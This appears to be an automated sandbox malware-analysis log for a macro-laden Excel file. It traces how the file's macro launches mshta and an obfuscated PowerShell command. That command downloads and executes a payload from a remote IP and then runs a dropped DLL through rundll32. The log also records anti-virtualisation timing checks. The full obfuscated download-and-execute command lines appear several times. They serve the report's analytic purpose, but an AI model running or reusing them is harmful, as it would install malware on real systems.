Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729BA817	8_2_729BA817
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729A1ED0	8_2_729A1ED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729AFEC0	8_2_729AFEC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729B9EC0	8_2_729B9EC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729D1F97	8_2_729D1F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729A8F70	8_2_729A8F70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729A5CC0	8_2_729A5CC0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 729B4030 appears 47 times

Source: 36C9.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: ggnlRjkfr4.xls	Macro extractor: Sheet name: oo
Source: ggnlRjkfr4.xls	Macro extractor: Sheet name: oo

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: ggnlRjkfr4.xls

OLE indicator, VBA macros: true

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: ggnlRjkfr4.xls

Virustotal: Detection: 11%

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................P...............................P.......................`I.........v.....................K......8.o.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................$k....................................}..v....`.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................$k..... ..............................}..v............0...............8.o.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................$k....................................}..v....0.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................$k......o.............................}..v............0.................o.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#.................$k....................................}..v.....+......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#.................$k......o.............................}..v....x,......0...............H.o.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............4.$k....E...............................}..v............0.................o.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+...............4.$k....E...............................}..v............0.................o.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............(.......:.......................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://87.251.86.178/pp/oo.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://87.251.86.178/pp/oo.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Documents\ssd.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD529.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@13/8@2/35

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_729A58B0 CoCreateInstance,OleRun,CoCreateInstance,

8_2_729A58B0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: ggnlRjkfr4.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_729A9E80 LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

8_2_729A9E80

Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp

Source: 36C9.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Obfuscated command line found

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html			Jump to behavior

Source: C:\Windows\System32\mshta.exe	Code function: 3_3_037208CC push 8B490309h; iretd	3_3_037208D1
Source: C:\Windows\System32\mshta.exe	Code function: 3_3_037200BF push 8B490309h; iretd	3_3_037200C5
Source: C:\Windows\System32\mshta.exe	Code function: 3_3_037208CC push 8B490309h; iretd	3_3_037208D1
Source: C:\Windows\System32\mshta.exe	Code function: 3_3_037200BF push 8B490309h; iretd	3_3_037200C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018176C push ebp; iretd	8_2_0018176D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729B4209 push ecx; ret	8_2_729B421C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729B4080 push ecx; ret	8_2_729B4093

Source: ssd.dll.5.dr	Static PE information: section name: .00cfg
Source: ssd.dll.5.dr	Static PE information: section name: .faxt
Source: ssd.dll.5.dr	Static PE information: section name: .voltbl

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Documents\ssd.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000007299D9AF second address: 000000007299D9D7 instructions: 0x00000000 rdtscp 0x00000003 xor ecx, ecx 0x00000005 mov esi, 00989680h 0x0000000a cmp esi, eax 0x0000000c sbb ecx, edx 0x0000000e mov edi, 021BDE81h 0x00000013 jc 00007FE984B98325h 0x00000015 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000007299E622 second address: 000000007299E64D instructions: 0x00000000 rdtscp 0x00000003 mov ecx, 00989680h 0x00000008 cmp ecx, eax 0x0000000a mov eax, 00000000h 0x0000000f sbb eax, edx 0x00000011 mov edi, 0D30C165h 0x00000016 jc 00007FE984BFAE65h 0x00000018 rdtscp

Source: C:\Windows\System32\mshta.exe TID: 2072	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2072	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_7299D9A0 rdtscp

8_2_7299D9A0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729CB634 FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,		8_2_729CB634
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729CB581 _free,_free,FindFirstFileExW,_free,		8_2_729CB581

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000005.00000002.664760996.000000000023E000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_729C070F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_729C070F

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_729B3665 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,VirtualAlloc,RaiseException,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,

8_2_729B3665

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_7299D9A0 rdtscp

8_2_7299D9A0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00191E59 mov eax, dword ptr fs:[00000030h]	8_2_00191E59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_7299D9A0 mov eax, dword ptr fs:[00000030h]	8_2_7299D9A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_7299D9A0 mov eax, dword ptr fs:[00000030h]	8_2_7299D9A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_7299D9A0 mov ecx, dword ptr fs:[00000030h]	8_2_7299D9A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729CB17F mov eax, dword ptr fs:[00000030h]	8_2_729CB17F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729B35F9 mov esi, dword ptr fs:[00000030h]	8_2_729B35F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729BF8CC mov eax, dword ptr fs:[00000030h]	8_2_729BF8CC
